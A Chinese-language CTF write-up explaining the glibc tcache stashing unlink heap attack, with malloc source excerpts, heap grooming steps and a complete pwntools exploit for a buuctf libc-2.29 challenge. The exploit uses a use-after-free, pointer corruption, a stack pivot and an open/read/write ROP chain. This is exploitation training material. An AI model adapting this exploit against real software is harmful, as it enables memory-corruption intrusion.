tcache stashing unlink attack

引自大佬：

[原创] CTF 中 glibc堆利用及 IO_FILE 总结-Pwn-看雪-安全社区|安全招聘|kanxue.com

先来看house of lore，如果能够修改small bin的某个free chunk的bk为fake chunk，并且通过修改fake chunk的fd为该free chunk，绕过__glibc_unlikely( bck->fd != victim )检查，就可以通过申请堆块得到这个fake chunk，进而进行任意地址的读写操作。
当在高版本libc下有tcache后，将会更加容易达成上述目的，因为当从small bin返回了一个所需大小的chunk后，在将剩余堆块放入tcache bin的过程中，除了检测了第一个堆块的fd指针外，都缺失了__glibc_unlikely (bck->fd != victim)的双向链表完整性检测，又calloc()会越过tcache取堆块，因此有了如下tcache_stashing_unlink_attack的攻击手段，并同时实现了libc的泄露或将任意地址中的值改为很大的数（与unsorted bin attack很类似）。

假设目前tcache bin中已经有五个堆块，并且相应大小的small bin中已经有两个堆块，由bk指针连接为：chunk_A<-chunk_B。
利用漏洞修改chunk_A的bk为fake chunk，并且修改fake chunk的bk为target_addr - 0x10。

通过calloc()越过tcache bin，直接从small bin中取出chunk_B返回给用户，并且会将chunk_A以及其所指向的fake chunk放入tcache bin（这里只会检测chunk_A的fd指针是否指向了chunk_B）。

while ( tcache->counts[tc_idx] < mp_.tcache_count
    && (tc_victim = last (bin) ) != bin) //验证取出的Chunk是否为Bin本身（Smallbin是否已空）
{
 if (tc_victim != 0) //成功获取了chunk
 {
     bck = tc_victim->bk; //在这里bck是fake chunk的bk
     //设置标志位
     set_inuse_bit_at_offset (tc_victim, nb);
     if (av != &main_arena)
         set_non_main_arena (tc_victim);
 
     bin->bk = bck;
     bck->fd = bin; //关键处
 
     tcache_put (tc_victim, tc_idx); //将其放入到tcache中
 }
}

在fake chunk放入tcache bin之前，执行了bck->fd = bin;的操作（这里的bck就是fake chunk的bk，也就是target_addr - 0x10），故target_addr - 0x10的fd，也就target_addr地址会被写入一个与libc相关大数值（可利用）。
再申请一次，就可以从tcache中获得fake chunk的控制权。

综上，此利用可以完成获得任意地址的控制权和在任意地址写入大数值两个任务，这两个任务当然也可以拆解分别完成。

获得任意地址target_addr的控制权：在上述流程中，直接将chunk_A的bk改为target_addr - 0x10，并且保证target_addr - 0x10的bk的fd为一个可写地址（一般情况下，使target_addr - 0x10的bk，即target_addr + 8处的值为一个可写地址即可）。
在任意地址target_addr写入大数值：在unsorted bin attack后，有时候要修复链表，在链表不好修复时，可以采用此利用达到同样的效果，在高版本glibc下，unsorted bin attack失效后，此利用应用更为广泛。在上述流程中，需要使tcache bin中原先有六个堆块，然后将chunk_A的bk改为target_addr - 0x10即可。

总结：这里主要针对任意地址写libc地址功能，申请fake chunk的操作一样，需要下边tcache里存放的是5个chunk。

这里就有一个疑问，怎么能达到在tcache bin里存放6个chunk且在同size的small bin中存放两个chunk呢。

常规思路中，我们要向small bin中放入chunk需要tcache是满的，因此可以申请9个chunk，7个free进tcache，2个free进small bin，但是calloc是跳过tcache的，我们此时add是申请不出来在tcache里的chunk的，也就没法实现tcache里剩余6个chunk的效果。

因此，需要通过unsorted bin的分割来实现，

首先add 6个 size_1的chunk，free这6个chunk进入list[size_1]的tcache中。
之后，add 10个size_2(size_2 > size_1)的chunk，free(3-9)个进入list[size_2]的tcache里填满，之后free(2)进入unsorted bin，再free(0)进入unsorted bin，1用来防止两个unsorte bin合并。
此时，tcache的list[size_1]里有6个chunk，tcache的list[size_2]里有7个chunk，unsorted bin里有两个size_2的chunk。

此时bin如图所示:
之后，三次add size_3 (size_3 = size_2 - size_1),由于unsorted bin的切割,会把两个的size_1的chunk放到small bin[size_1]里，这样就实现了tcache里有6个size_1 chunk，small bin里有两个size_1 chunk。

三次add后bin如图所示：
之后，通过漏洞修改small bin[size_1]中倒数第二个chunk的bk为target-0x10，记得还原fd，再次add size_1即可修改target = libc_bin。

例题：buuctf [2020 新春红包题]3

首先分析题目，libc-2.29，沙箱禁用了execve

add为calloc函数，且只能申请固定的四种size的chunk。

free存在uaf漏洞。

同时存在后门函数magic，magic中满足堆上某一地址 > 0x7f000000000即可，这里通过上述tcache stashing unlink attack可以实现，之后进行栈溢出，由于栈溢出长度为0x10，因此考虑栈迁移到堆上执行orw_rop。

完整exp：

from pwn import *
from ctypes import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')

def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r(a):
    return p.recv(a)
def ru(a):
    return p.recvuntil(a)
def debug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb(libcbase):
    return libcbase + libc.sym['system'], libcbase + next(libc.search(b'/bin/sh\x00'))


#p = remote("node5.buuoj.cn",28840)
p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc-2.29.so')

def add(idx,choose,content = b'a'):
    sla('Your input: ','1')
    sla('Please input the red packet idx: ',str(idx))
    sla('How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ',str(choose))
    sla('Please input content: ',content)
def free(idx):
    sla('Your input: ','2')
    sla('Please input the red packet idx: ',str(idx))
def edit(idx,content = b'a'):
    sla('Your input: ','3')
    sla('Please input the red packet idx: ',str(idx))
    sla('Please input content: ',content)
def show(idx):
    sla('Your input: ','4')
    sla('Please input the red packet idx: ',str(idx))
def magic(data):
    sla('Your input: ','666')
    sa('want to say?',data)
    
#leak libc and heap
for i in range(6):
	add(0,2)
	free(0)

for i in range(10):
	add(i,4)   #0~9
for i in range(9,1,-1):
	free(i)
free(0)
show(2)
libc_base = get_addr() - 0x1e4ca0
success("libc_base: " + hex(libc_base))
show(3)
heap_base = u64(r(6).ljust(8,b'\x00')) - 0x28b0
success("heap_base: " + hex(heap_base))

#tcache stashing unlink attack

add(11,3)
add(12,3)
add(13,3)
debug()
target = heap_base + 0x260 + 0x800 - 0x10
edit(2,p64(1) * 0x61 + p64(0x101) + p64(heap_base + 0x1b70) + p64(target))


add(14,2)

#set rop,change ret to orw
leave_ret = libc_base + 0x58373
pop_rdi = libc_base + 0x26542
pop_rsi = libc_base + 0x26f9e
pop_rdx = libc_base + 0x12bda6
pop_rax = libc_base + 0x47cf8

orw = b'./flag\x00\x00'
heap_addr = heap_base + 0x4420
orw+=flat(pop_rdi,heap_addr,pop_rsi,0,libc.sym['open']+libc_base)
orw+=flat(pop_rdi,3,pop_rsi,heap_addr+0x200,pop_rdx,0x50,libc.sym['read']+libc_base)
orw+=flat(pop_rdi,1,pop_rsi,heap_addr+0x200,pop_rdx,0x50,libc.sym['write']+libc_base)

add(15,4,orw)
payload = b'a' * 0x80 + p64(heap_addr) + p64(leave_ret)
magic(payload)

p.interactive()